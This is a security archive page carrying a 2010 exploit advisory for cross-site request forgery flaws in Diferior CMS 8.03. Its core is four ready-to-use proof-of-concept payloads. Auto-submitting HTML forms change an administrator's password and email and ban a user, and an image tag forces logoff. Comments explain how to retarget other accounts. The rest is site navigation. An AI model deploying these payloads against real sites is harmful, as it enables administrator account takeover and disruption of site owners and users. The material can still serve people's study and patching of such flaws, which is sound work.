Diferior CMS 8.03 Cross Site Request Forgery

Diferior CMS 8.03 Cross Site Request Forgery: Posted Jul 14, 2010; Authored by 10n1z3d; Diferior CMS version 8.01 suffers from multiple cross site request forgery vulnerabilities.; tags | exploit, vulnerability, csrf; MD5 | 422f0eb4756000530ca272c6399a4bce; Download | Favorite | Comments (0)

Diferior CMS 8.03 Cross Site Request Forgery

<!---
    Title: Diferior CMS 8.03 Multiple CSRF Vulnerabilities
    Author: 10n1z3d <10n1z3d[at]w[dot]cn>
    Date: Tue 13 Jul 2010 11:50:32 AM EEST
    Vendor: http://diferior.com/
    Download: http://diferior.com/post_files/news/diferior-8-03-released/Diferior_v8.03.tar.gz
--->
 
-=[ CSRF PoC 1 - Change Admin Password ]=-
 
    <html>
        <head>
            <title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Password</title>
        </head>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://[domain]/user/profile/pass.html" method="post">
                <!--- You can change cust_user to change the password of other user --->
                <input type="hidden" name="cust_user" value="admin" />
                <input type="hidden" name="pass1" value="rootroot" />
                <input type="hidden" name="pass2" value="rootroot" />
            </form>
        </body>
    </html>
     
-=[ CSRF PoC 2 - Change Admin Email ]=-
     
    <html>
        <head>
            <title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Change Admin Email</title>
        </head>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://[domain]/user/profile/email.html" method="post">
                 <!--- You can change cust_user to change the email of other user --->
                <input type="hidden" name="cust_user" value="admin" />
                <input type="hidden" name="email1" value="root@root.com" />
                <input type="hidden" name="email2" value="root@root.com" />
            </form>
        </body>
    </html>
     
-=[ CSRF PoC 3 - Ban User ]=-
     
    <html>
        <head>
            <title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities - Ban User</title>
        </head>
        <body onload="document.csrf.submit();">
            <form name="csrf" action="http://[domain]/user/ban/[username]/2.html" method="post">
                <input type="hidden" name="warned" value="on" />
                <input type="hidden" name="noleech" value="on" />
                <input type="hidden" name="banned" value="on" />
            </form>
        </body>
    </html>
 
-=[ CSRF PoC 4 - Logout The User/Administrator ]=-
 
    <img src="http://[domain]/user/logoff.html" alt="Do you see this?" />
 
<!---
    http://www.evilzone.org/
    irc.evilzone.org  (6697 / 9999)
--->

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
HP 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

Diferior CMS 8.03 Cross Site Request Forgery

Diferior CMS 8.03 Cross Site Request Forgery

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Diferior CMS 8.03 Cross Site Request Forgery

Share This

Diferior CMS 8.03 Cross Site Request Forgery

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems